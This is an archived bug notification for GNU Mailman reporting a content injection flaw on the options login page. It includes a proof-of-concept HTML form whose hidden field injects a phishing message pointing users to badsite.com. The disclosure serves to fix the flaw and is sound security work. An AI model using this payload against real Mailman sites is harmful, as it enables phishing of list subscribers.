[Bug 1873722] [NEW] Arbitrary Content Injection via the options login page.
Mark Sapiro
mark at msapiro.net
Sun Apr 19 23:05:39 EDT 2020
*** This bug is a security vulnerability ***
Private security bug reported:
An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/
exists at different endpoint & param. It can lead to a phishing attack.
Steps To Reproduce:
1. Copy and save the following HTML code and open it in any browser.
Code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/mailman/options/mailman" method="POST">
<input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" />
<input type="hidden" name="UserOptions" value="Unsubscribe or edit options" />
<input type="hidden" name="language" value="en" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Can be seen there- "Your account has been hacked. Kindly go to
https://badsite.com or share your credentials at attacker at badsite.com"
message will be displayed on the screen.
** Affects: mailman
Importance: Medium
Assignee: Mark Sapiro (msapiro)
Status: Confirmed
--
You received this bug notification because you are a member of Mailman
Coders, which is subscribed to GNU Mailman.
https://bugs.launchpad.net/bugs/1873722
Title:
Arbitrary Content Injection via the options login page.
To manage notifications about this bug go to:
https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions
More information about the Mailman-coders
mailing list